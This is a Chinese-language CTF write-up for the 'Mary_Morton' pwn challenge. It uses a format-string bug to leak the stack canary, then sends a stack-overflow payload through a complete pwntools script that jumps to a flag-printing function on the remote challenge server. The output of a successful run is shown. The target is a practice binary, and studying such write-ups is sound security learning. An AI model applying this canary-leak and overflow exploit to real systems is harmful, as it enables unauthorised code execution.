0x01漏洞

ida
漏洞都给你放在那里了...一个栈溢出，一个格式化字符串可以利用
存在sub_4008DA函数可以直接cat flag
checksec

kk@ubuntu:~/Desktop/black/GFSJ/Mary_Morton$ checksec Mary_Morton 
[*] '/home/kk/Desktop/black/GFSJ/Mary_Morton/Mary_Morton'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

0x02思路

主要这个开启了canary，就不能直接利用栈溢出覆盖返回地址了
所以可以通过格式化字符串漏洞泄露canary的值，然后再进行栈溢出的覆盖
来看一看canary - CTF Wiki

计算偏移
测试该格式化字符串为第几个参数

kk@ubuntu:~/Desktop/black/GFSJ/Mary_Morton$ ./Mary_Morton 
Welcome to the battle ! 
[Great Fairy] level pwned 
Select your weapon 
1. Stack Bufferoverflow Bug 
2. Format String Bug 
3. Exit the battle 
2
AAAA%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
AAAA0x7ffcdd58bae00x7f0x7f3eab892260(nil)(nil)0x70257025414141410x70257025702570250x70257025702570250x70257025702570250xa7025(nil)(nil)(nil)(nil)(nil)

可以确定为格式化字符串的第6个参数

canary与我们输入参数的偏移为0x90 - 8 = 0x88，然后八个字节为一组，0x88 / 8 = 17，17 + 6 = 23

0x03攻击

#!usr/bin/python
from pwn import *

io = remote( '111.198.29.45',54307)
# io = process("./Mary_Morton")

flag_addr = 0x4008DA

io.recvuntil("battle ")
io.sendline(str(2))
io.sendline("%23$p")
io.recvuntil("0x")
canary = int(io.recv(16), 16)

io.sendlineafter("battle ", str(1))
payload = "a" * 0x80 + "a" * 8 + p64(canary) + 'a' * 8 + p64(flag_addr)
io.sendline(payload)

io.interactive()

---

kk@ubuntu:~/Desktop/black/GFSJ/Mary_Morton$ python exp.py 
[+] Opening connection to 111.198.29.45 on port 54307: Done
[*] Switching to interactive mode

-> aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
cyberpeace{…………}
[*] Got EOF while reading in interactive
$